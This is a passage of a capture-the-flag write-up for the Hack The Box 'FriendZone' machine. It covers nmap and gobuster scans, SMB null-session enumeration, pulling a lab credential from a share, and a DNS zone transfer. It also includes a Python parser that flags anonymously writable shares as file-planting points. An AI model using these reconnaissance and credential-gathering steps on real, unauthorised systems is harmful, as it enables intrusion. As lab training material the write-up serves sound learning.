Introduction
I am a Hack The Box beginner. If you have any corrections, additions, or advice, please leave a comment or contact me on Twitter. さんぽし(@sanpo_shiho) | Twitter
cheat sheet
I keep a cheat sheet of tool usage and similar notes at the following link; feel free to use it as a reference. github | sanposhiho/MYCHEATSHEET
About the machine
The difficulty rating is easy.
Among the easy machines, this one is on the harder side.
nmap
kali@kali:~$ nmap -sV -sC 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 00:08 EDT
Nmap scan report for 10.10.10.123
Host is up (0.23s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -55m52s, deviation: 1h43m54s, median: 4m06s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2020-06-20T07:13:43+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-20T04:13:42
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.33 seconds
Port 80
gobuster
kali@kali:~$ gobuster dir -u http://10.10.10.123 -w SecLists/Discovery/Web-Content/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.123
[+] Threads: 40
[+] Wordlist: SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/20 00:18:04 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)
kali@kali:~$ gobuster dir -u http://10.10.10.123/wordpress -w SecLists/Discovery/Web-Content/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.123/wordpress
[+] Threads: 40
[+] Wordlist: SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/21 16:39:16 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
===============================================================
2020/06/21 16:46:07 Finished
===============================================================
Port 443
gobuster
kali@kali:~$ gobuster dir -u https://10.10.10.123 -w SecLists/Discovery/Web-Content/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.123
[+] Threads: 40
[+] Wordlist: SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/20 00:24:32 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/06/20 00:31:12 Finished
===============================================================
enum4linux
kali@kali:~$ enum4linux -a 10.10.10.123
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 21 14:27:20 2020
==========================
| Target Information |
==========================
Target ........... 10.10.10.123
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.10.123 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 10.10.10.123 |
============================================
Looking up status of 10.10.10.123
FRIENDZONE <00> - B <ACTIVE> Workstation Service
FRIENDZONE <03> - B <ACTIVE> Messenger Service
FRIENDZONE <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 10.10.10.123 |
=====================================
[+] Server 10.10.10.123 allows sessions using username '', password ''
===========================================
| Getting domain SID for 10.10.10.123 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 10.10.10.123 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.123 from smbclient:
[+] Got OS info for 10.10.10.123 from srvinfo:
FRIENDZONE Wk Sv PrQ Unx NT SNT FriendZone server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 10.10.10.123 |
=============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
=========================================
| Share Enumeration on 10.10.10.123 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$ Mapping: DENIED, Listing: N/A
//10.10.10.123/Files Mapping: DENIED, Listing: N/A
//10.10.10.123/general Mapping: OK, Listing: OK
//10.10.10.123/Development Mapping: OK, Listing: OK
//10.10.10.123/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
====================================================
| Password Policy Information for 10.10.10.123 |
====================================================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.10.123 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Trying protocol 445/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 10.10.10.123 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 10.10.10.123 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3651157261-4258463691-276428382
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\friend (Local User)
[+] Enumerating users using SID S-1-5-21-3651157261-4258463691-276428382 and logon username '', password ''
S-1-5-21-3651157261-4258463691-276428382-500 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-501 FRIENDZONE\nobody (Local User)
S-1-5-21-3651157261-4258463691-276428382-502 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-503 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-504 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-505 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-506 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-507 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-508 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-509 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-510 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-511 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-512 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-513 FRIENDZONE\None (Domain Group)
S-1-5-21-3651157261-4258463691-276428382-514 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-515 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-516 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-517 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-518 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-519 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-520 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-521 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-522 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-523 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-524 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-525 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-526 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-527 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-528 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-529 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-530 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-531 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-532 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-533 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-534 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-535 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-536 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-537 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-538 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-539 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-540 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-541 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-542 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-543 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-544 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-545 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-546 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-547 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-548 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-549 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-550 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1000 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1001 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1002 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1003 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1004 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1005 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1006 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1007 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1008 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1009 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1010 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1011 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1012 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1013 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1014 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1015 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1016 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1017 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1018 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1019 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1020 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1021 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1022 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1023 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1024 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1025 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1026 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1027 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1028 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1029 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1030 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1031 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1032 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1033 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1034 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1035 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1036 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1037 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1038 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1039 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1040 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1041 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1042 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1043 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1044 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1045 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1046 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1047 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1048 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1049 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1050 *unknown*\*unknown* (8)
=============================================
| Getting printer info for 10.10.10.123 |
=============================================
No printers returned.
enum4linux complete on Sun Jun 21 14:56:12 2020
nmap-script smb
kali@kali:~$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 14:35 EDT
Nmap scan report for 10.10.10.123
Host is up (0.26s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
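The share listing above is where the foothold on this box comes from: a share that an anonymous (null-session) client can write to, whose on-disk path the server also leaks, is a place to plant a file for a later file inclusion. The following Python is an added example, not code from the original writeup; it parses the nmap smb-enum-shares output above (embedded inline as the sample, trimmed to the fields it uses) and lists the anonymous-writable disk shares with their Unix paths.

```python
import re

# Constructed sample: the smb-enum-shares block from the nmap run above,
# trimmed to the fields this parser uses.
SAMPLE = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.123\Development:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
"""

# A share header line looks like \\HOST\SHARE: once the "| " prefix is stripped.
SHARE_HEADER = re.compile(r"^\\\\([^\\]+)\\(.+):$")


def parse_shares(text):
    """Parse nmap smb-enum-shares output into {share_name: {field: value}}."""
    shares, current = {}, None
    for raw in text.splitlines():
        m = re.match(r"^\|[ _]\s*(.*?)\s*$", raw)  # strip the "| " / "|_" prefix
        if not m:
            continue
        body = m.group(1)
        header = SHARE_HEADER.match(body)
        if header:
            current = header.group(2)
            shares[current] = {"host": header.group(1)}
            continue
        if current is None or ":" not in body:
            continue
        key, _, value = body.partition(":")
        shares[current][key.strip().lower().replace(" ", "_")] = value.strip()
    return shares


def unix_path(win_path):
    """nmap renders Samba paths Windows-style (drive letter, backslashes);
    map them back to the Unix path the Samba config actually exports."""
    return re.sub(r"^[A-Za-z]:", "", win_path).replace("\\", "/")


def anonymous_writable(shares):
    """Share names an unauthenticated (null-session) client can write to."""
    return sorted(n for n, i in shares.items() if "WRITE" in i.get("anonymous_access", ""))


def drop_points(shares):
    """Anonymous-writable disk shares with their on-disk Unix paths. IPC$ is
    writable too but is not a filesystem, so it is excluded by type."""
    writable = set(anonymous_writable(shares))
    return {
        n: unix_path(i["path"])
        for n, i in shares.items()
        if n in writable and i.get("type") == "STYPE_DISKTREE"
    }


if __name__ == "__main__":
    parsed = parse_shares(SAMPLE)
    for name, path in drop_points(parsed).items():
        print(f"{name}: anonymous write, on-disk path {path}")
```

Run against the output above it reports Development (/etc/Development) and general (/etc/general); the Files share advertises /etc/Files in its comment but is actually backed by /etc/hole and is not anonymously accessible, so only the paths nmap reports should be trusted.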
Trying the shares with smbclient
kali@kali:~$ smbclient //10.10.10.123/general
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Wed Jan 23 16:51:02 2019
creds.txt N 57 Tue Oct 9 19:52:42 2018
9221460 blocks of size 1024. 6460296 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit
kali@kali:~$ smbclient //10.10.10.123/Development
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 21 14:40:00 2020
.. D 0 Wed Jan 23 16:51:02 2019
9221460 blocks of size 1024. 6460296 blocks available
smb: \> exit
kali@kali:~$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
We have obtained some kind of credentials (the "admin THING" they belong to is not yet clear).
hostname
Port 443 only returns 404 Not Found and gives nothing useful by IP, so I looked at the TLS certificate instead: its commonName is friendzone.red, which is the virtual host name the server expects.
I added 10.10.10.123 friendzone.red
to /etc/hosts and accessed the site by that name.
gobuster again
kali@kali:~$ gobuster dir -u https://friendzone.red -w SecLists/Discovery/Web-Content/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://friendzone.red
[+] Threads: 40
[+] Wordlist: SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/21 16:55:39 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/admin (Status: 301)
/js (Status: 301)
/server-status (Status: 403)
===============================================================
2020/06/21 17:02:30 Finished
===============================================================
/js/js
Testing some functions !
I'am trying not to break things !
TzNlR0g4QzhnSzE1OTI3NzM5NTl4R2tlRjcwdE15
The string changed on every access. Hmm, I didn't really understand it, so I put it aside for later. (The value is base64: it decodes to O3eGH8C8gK1592773959xGkeF70tMy, and the ten digits in the middle are a Unix epoch timestamp, which is why it differs from request to request.)
subdomain enumeration
Port 53 is open, so I enumerate subdomains by asking the target's own name server for a zone transfer (host -l performs an AXFR). If the server allows transfers from arbitrary clients, this dumps the whole friendzone.red zone.
kali@kali:~$ host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
